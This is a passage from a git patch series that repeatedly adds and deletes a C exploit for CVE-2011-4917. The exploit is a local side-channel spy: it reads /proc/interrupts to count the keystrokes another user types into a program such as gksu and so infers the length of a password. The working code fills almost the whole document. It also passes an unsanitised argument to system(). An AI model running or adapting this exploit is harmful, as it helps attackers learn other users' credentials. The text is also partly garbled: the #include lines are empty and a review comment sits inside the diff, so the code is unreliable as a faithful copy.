From 959380488ec88566de20558aa077233c55f1812c Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:27:05 +0000 Subject: [PATCH 01/26] add cve/linux-kernel. Signed-off-by: KunWang --- cve/linux-kernel/2011 | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011 diff --git a/cve/linux-kernel/2011 b/cve/linux-kernel/2011 new file mode 100644 index 00000000..e69de29b -- Gitee From a92cd7be1681642e97085f9b69ba5ef4e8e07d10 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:27:22 +0000 Subject: [PATCH 02/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011 | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011 diff --git a/cve/linux-kernel/2011 b/cve/linux-kernel/2011 deleted file mode 100644 index e69de29b..00000000 -- Gitee From ca099e1bf7b00b66573d5c44d674f25a9ed4c92f Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:29:01 +0000 Subject: [PATCH 03/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 1e483316c3e496c591ed931392790d806166af6a Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:29:18 +0000 Subject: [PATCH 04/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/.keep 
diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e6e3407fa15f7966b44a93747143f1ee3c9df746 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:29:35 +0000 Subject: [PATCH 05/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202011?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/.keep diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2bb18f054a45c1833a45508b9e175bff0eaf3072 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:31:48 +0000 Subject: [PATCH 06/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?.c.=20CVE-2011-4917.c=E6=98=AFCVE-2011-4917=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E7=9A=84=E5=88=A9=E7=94=A8=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917.c | 178 ++++++++++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917.c 
@@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < 
number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From ba54902eb26143d2ba52b29b380644e6b12a5b30 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:32:00 +0000 Subject: [PATCH 07/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/.keep 
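Review bot: `char *names[1024];` in init_i8042_number is never initialised, yet reread_ints only calls strdup when `names[i] == NULL` and the following loop hands `names[i]` straight to strcmp, so any slot whose stack garbage is non-zero is dereferenced as an indeterminate pointer; declare it `char *names[1024] = {0};`. The same call passes `sizeof(ints_prev)` (a byte count, 4096) as `int_count` while `interrupts` and `names` hold 1024 entries, so the loop bound is four times the array length — use `sizeof(ints_prev) / sizeof(ints_prev[0])` there and in the two `reread_ints(ints, sizeof(ints), NULL)` calls. The file also carries no header saying what it is; a leading comment such as `/* CVE-2011-4917: counts i8042 keyboard interrupts read from the unprivileged-readable /proc/interrupts to infer how many keystrokes another process received. */` would let a reader place it without running it. The identical 178-line file is re-added under progressively deeper paths in [PATCH 09/26], [PATCH 13/26] and [PATCH 17/26] (and deleted again in between); those hunks have the same issues and the series should be squashed to a single add. The `#include` lines appear here with no header names, which looks like a rendering artifact — confirm the stored file is not actually missing them.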
diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From d06507b745272cadd5b2f8253d679a094dfbb6c5 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:32:25 +0000 Subject: [PATCH 08/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From b1a7b0d4865c9556fa7fd5e188791611e1cdb7fd Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:33:14 +0000 Subject: [PATCH 09/26] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-4917?= =?UTF-8?q?/CVE-2011-4917.c.=20CVE-2011-4917=E7=9A=84=E5=88=A9=E7=94=A8?= =?UTF-8?q?=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../2011/CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c 
@@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < 
number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From 969c5a1d9077ab0276a25b0f3d602ed66af85963 Mon Sep 17 00:00:00 2001 
From: KunWang Date: Mon, 10 Apr 2023 08:34:24 +0000 Subject: [PATCH 10/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917.c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917.c | 178 -------------------------- 1 file changed, 178 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917.c deleted file mode 100644 index 949781c2..00000000 --- a/cve/linux-kernel/2011/CVE-2011-4917.c +++ /dev/null 
@@ -1,178 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; - -char buffer[1024]; - -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < 
number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. - */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file -- Gitee From d1c1556e1822f901a587503608d160997df8a1d1 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:34:56 +0000 Subject: [PATCH 11/26] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep 
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 56e3b53471d8e999f0887aea067170d7a785e820 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:35:36 +0000 Subject: [PATCH 12/26] add cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c. Signed-off-by: KunWang --- cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c new file mode 100644 index 00000000..e69de29b -- Gitee From 0f5e366e69c3ca0028c1882b02986b03fe84a1a2 Mon Sep 17 00:00:00 2001 From: KunWang Date: Mon, 10 Apr 2023 08:36:15 +0000 Subject: [PATCH 13/26] =?UTF-8?q?update=20cve/linux-kernel/2011/CVE-2011-4?= =?UTF-8?q?917/CVE-2011-4917/CVE-2011-4917.c.=20CVE-2011-4917=E5=88=A9?= =?UTF-8?q?=E7=94=A8=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: KunWang --- .../CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c index e69de29b..bab4fad3 100644 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c +++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917/CVE-2011-4917.c 
@@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < 
number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file -- Gitee From 5d086e9268a04715462703310e50daa0b88dadf8 Mon Sep 17 00:00:00 2001 
From: KunWang Date: Mon, 10 Apr 2023 08:38:02 +0000 Subject: [PATCH 14/26] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2011/CVE-2011-4917/CVE-2011-4917.c | 178 ------------------ 1 file changed, 178 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c deleted file mode 100644 index 949781c2..00000000 --- a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c +++ /dev/null 
@@ -1,178 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; - -char buffer[1024]; - -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < 
number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. - */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file -- Gitee From 6573fee46bce2b4d0cfd7fbad42b2dd45edd4124 Mon Sep 17 00:00:00 2001 
